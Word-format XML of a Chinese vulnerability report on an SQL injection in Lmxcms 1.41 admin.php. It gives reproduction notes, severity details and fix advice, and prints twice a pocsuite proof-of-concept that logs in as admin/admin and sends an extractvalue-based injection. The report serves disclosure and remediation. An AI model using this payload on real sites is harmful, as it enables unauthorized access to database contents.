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漏洞对象：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lmxcms</w:t>
      </w:r>
      <w:r>
        <w:t>存在SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>风险管理及规避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修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lmxcms admin.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的bug，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对G</w:t>
      </w:r>
      <w:r>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式传入的值进行安全过滤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以防止sql注入。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</w:rPr>
        <w:t>测试方法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在网站URL处修改内容，使用SQL语句，可获取内容</w:t>
      </w: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200785"/>
            <wp:effectExtent l="0" t="0" r="698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936625"/>
            <wp:effectExtent l="0" t="0" r="698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2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由于是admin.php处存在bug，因此需要先登陆admin账户，再进行SQL注入，于是利用POC的session模板。我们需要burpsuite进行抓包，获取path、data值，以此完成POC编写。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测试中所用的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp Suite Professional 1.7.37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2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="1" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="2" w:name="_Toc19260"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="15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POC插件编写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#!/usr/bin/env python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-*- coding: utf-8 -*-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pocsuite.api.request import req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pocsuite.api.poc import register,Output, POCBase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pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url, dnslog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TestPOC(POCBase):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vulID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cveID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cnvdID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cnnvdID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version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author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vulDate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createDate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updateDate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name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desc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solution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severity = ''''''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vulType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taskType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references = ['''''']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appName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appVersion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appPowerLink = ''''''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samples = ['']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install_requires = ['''''']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 _attack(self):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self._verify()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 _verify(self):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self.url,ip,port = parse_ip_port(self.target, 80)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 =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 = req.session()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headers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'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',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'Content-Type':'application/x-www-form-urlencoded',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'Referer':self.url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path = '/lmxcms1.41/admin.php?m=login&amp;a=login'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 = '''name=admin&amp;pwd=admin&amp;sub=%E7%99%BB%E5%BD%95'''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vulur = make_verify_url(self.url, path, mod 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base_resp = s.post(vulur, headers = headers, verify = False, allow_redirects = False, timeout = 10, data = data)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base_resp.status_code == 200 and '登录成功&lt;/span&gt;&lt;/a&gt;&lt;/h1&gt;' in base_resp.content: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 ("getit")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path = '''/lmxcms1.41/admin.php?m=Acquisi&amp;a=showCjData&amp;cid=extractvalue(1,concat(0x3a,md5(123),0x3a))%23&amp;id=1&amp;uid=1&amp;lid=1'''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vulurl = make_verify_url(self.url, path, mod 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resp = s.get(vulurl, headers = headers, verify = False, allow_redirects = False, timeout = 10)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"202cb962ac59075b964b07152d234b7" in resp.content and resp.status_code == 200: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result['VerifyInfo'] = http_packet(resp)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result['VerifyInfo']['URL'] = vulurl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result['VerifyInfo']['port'] = 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self.parse_output(result)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 parse_output(self, result):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#parse output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 = Output(self)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result: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output.success(result)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output.fail('Internet nothing returned')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output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register(TestPOC)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 w:ascii="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4"/>
        <w:tblW w:w="922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559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="15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7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>UVD-ID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rPr>
                <w:rFonts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漏洞类别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rPr>
                <w:rFonts w:hint="default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t>SQL注入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CVE-ID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line="480" w:lineRule="auto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7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>披露/发现时间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rPr>
                <w:rFonts w:hint="default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2022-07-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bugtraq编号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rPr>
                <w:rFonts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CNNVD-ID：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line="480" w:lineRule="auto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7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提交时间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  <w:t xml:space="preserve">    2022-07-20 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>21:40:3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漏洞发现者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rPr>
                <w:rFonts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CNVD-ID：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line="480" w:lineRule="auto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7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漏洞等级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rPr>
                <w:rFonts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高危</w:t>
            </w:r>
          </w:p>
        </w:tc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提交者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"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NK-11-XMH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搜索关键词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line="480" w:lineRule="auto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7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影响范围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--/ --/ v1.0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7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>来源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7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漏洞简介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lmxcms admin.php存在SQL注入漏洞，在类的初始化方法里对一些get方式传递的参数未作一定的过滤，导致恶意用户可以借此输入数据库查询语句，造成sql注入，获取数据库敏感信息。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7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漏洞详情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pStyle w:val="7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>参考链接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7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roma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靶场信息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8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POC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#!/usr/bin/env python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# -*- coding: utf-8 -*-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from pocsuite.api.request import req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from pocsuite.api.poc import register,Output, POCBase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from pocsuite.thirdparty.guanxing import parse_ip_port, http_packet, make_verify_url, dnslog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class TestPOC(POCBase):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vulID = ''''''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cveID = ''''''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cnvdID = ''''''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cnnvdID = ''''''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version = ''''''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author = ''''''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vulDate = ''''''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createDate = ''''''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updateDate = ''''''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name = ''''''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desc = ''''''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solution = ''''''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severity = '''''' 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vulType = ''''''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taskType = ''''''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references = ['''''']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appName = ''''''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appVersion = ''''''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appPowerLink = ''''''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samples = ['']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install_requires = ['''''']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def _attack(self):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return self._verify()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def _verify(self):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self.url,ip,port = parse_ip_port(self.target, 80)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result = {}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s = req.session()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headers = {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'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',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'Content-Type':'application/x-www-form-urlencoded',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'Referer':self.url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path = '/lmxcms1.41/admin.php?m=login&amp;a=login'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data = '''name=admin&amp;pwd=admin&amp;sub=%E7%99%BB%E5%BD%95'''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vulur = make_verify_url(self.url, path, mod = 0)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base_resp = s.post(vulur, headers = headers, verify = False, allow_redirects = False, timeout = 10, data = data)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if base_resp.status_code == 200 and '登录成功&lt;/span&gt;&lt;/a&gt;&lt;/h1&gt;' in base_resp.content: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print ("getit")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path = '''/lmxcms1.41/admin.php?m=Acquisi&amp;a=showCjData&amp;cid=extractvalue(1,concat(0x3a,md5(123),0x3a))%23&amp;id=1&amp;uid=1&amp;lid=1'''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vulurl = make_verify_url(self.url, path, mod = 0)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resp = s.get(vulurl, headers = headers, verify = False, allow_redirects = False, timeout = 10)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if "202cb962ac59075b964b07152d234b7" in resp.content and resp.status_code == 200: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result['VerifyInfo'] = http_packet(resp)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result['VerifyInfo']['URL'] = vulurl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   result['VerifyInfo']['port'] = port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return self.parse_output(result)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def parse_output(self, result):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#parse output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output = Output(self)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if result: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output.success(result)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else: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   output.fail('Internet nothing returned')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  return output</w:t>
            </w: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  <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>register(TestPOC)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center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/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21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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对GET方式传入的id值，进行安全过滤。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请关注厂商并更新至安全版本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http://www.lmxcms.com/</w:t>
            </w:r>
            <w:bookmarkStart w:id="3" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="3"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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zNDRkYTExYWE0YjljY2Y3MjgwNzc0MTliNWVjOGMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="10F34FB2"/>
    <w:rsid w:val="1B510BC7"/>
    <w:rsid w:val="21B93504"/>
    <w:rsid w:val="33EF143A"/>
    <w:rsid w:val="434B7B04"/>
    <w:rsid w:val="43FC20FF"/>
    <w:rsid w:val="45365A1A"/>
    <w:rsid w:val="4B955475"/>
    <w:rsid w:val="51B34D01"/>
    <w:rsid w:val="68DB6834"/>
    <w:rsid w:val="79575410"/>
    <w:rsid w:val="7B18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99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="1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A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern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797</Words>
  <Characters>3813</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>7</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5313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2022-07-20T12:51:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>雪泥鸿影</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-21T01:17:27Z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D5AF3FE73EEC44C2B8D245272725072A</vt:lpwstr>
  </property>
</Properties>
</file>